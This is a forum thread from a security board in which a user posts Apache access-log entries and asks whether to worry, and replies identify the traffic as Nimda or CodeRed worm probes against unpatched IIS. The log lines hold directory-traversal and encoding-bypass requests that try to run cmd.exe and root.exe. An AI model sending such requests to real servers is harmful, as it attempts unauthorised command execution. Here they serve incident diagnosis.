Should i worry? - Dev Shed

Dev Shed Forums Sponsor:

January 11th, 2004, 02:05 PM

Hovi

Registered User

Join Date: Oct 2003

Posts: 16

Time spent in forums: < 1 sec
Reputation Power: 0

Should i worry?

i saw this in my access log:
66.65.40.29 - - [11/Jan/2004:14:25:40 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:40 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:40 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:40 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:40 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:40 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:41 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:41 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:41 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:41 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:41 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:41 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:41 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 962 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:41 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 962 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:41 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"
66.65.40.29 - - [11/Jan/2004:14:25:41 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1029 "-" "-"

Should i worry and what is this person trying to do??
thnx in advance

January 12th, 2004, 02:08 AM

c444l

contains a pressurised widget

Join Date: Nov 2003

Location: NC USA

Posts: 401

Time spent in forums: 39 m 41 sec
Reputation Power: 6

it's not a person (if it is, it's just a script kiddie).. this is most likely a worm.. and probably something in the CodeRed family. of course, i'm just guessing here.

Unless this is a Microsoft server, this is probably not an issue at all. This crap will come through all the time as various worms start puking their code out to IPs.

If this is a Microsoft server, better check for trojans, viruses, and worms. But.. if you're all patched up, this exploit shouldn't work anymore anyway.

(and i don't mean to sound like i underestimate the damage of script kiddies.. they're usually clumsy enough to break something)

January 12th, 2004, 02:26 PM

alexgreg

Full Access

Join Date: Jun 2000

Location: London, UK

Posts: 2,019

Time spent in forums: 3 sec
Reputation Power: 12

This is caused by the Nimda worm. See http://www.symantec.com/avcenter/ve...nimda.a@mm.html

It only works against unpatched Microsoft IIS 4/5 servers. Since you're running Apache, you're safe.

__________________
Alex
(http://www.alex-greg.com)

Viewing: Dev Shed Forums > System Administration > Security and Cryptography > Should i worry?

« Previous Thread | Next Thread »

Thread Tools	Search this Thread
Email this Page	Search this Thread: Advanced Search
Display Modes	Rate This Thread
Linear Mode Switch to Hybrid Mode Switch to Threaded Mode	Rate This Thread:

Posting Rules
You may not post new threads You may not post replies You may not post attachments You may not edit your posts vB code is On Smilies are On [IMG] code is On HTML code is Off

View Your Warnings | New Posts | Latest News | Latest Threads | Shoutbox

Forum Jump

Free IT White Papers!

How to Present Effectively Online
This white paper offers practical and actionable advice on the key steps that any presenter should consider as they plan and execute a Webinar or online meeting.

Open Source Security Myths
Open Source Software (OSS) is computer software whose source code is available to the general public with relaxed or non-existent intellectual property restrictions (or arrangement such as the public domain), and is usually developed with the input of many contributors.

Power and Cooling Capacity Management for Data Centers
This paper describes the principles for achieving power and cooling capacity management.

Scalable, Fault-Tolerant NAS for Oracle - The Next Generation
For several years NAS has been evolving as a storage alternative for Oracle databases, and for good reason: NAS is quite often the simplest, most cost-effective storage approach for Oracle. Learn about the benefits that HP's approach to scalable NAS brings to Oracle environments in this comprehensive white paper.

Understanding Web Application Security Challenges
This white paper discusses many common threats and preventive measures for Web application security, and explains what you can do to help protect your organization.

More Free IT White Papers!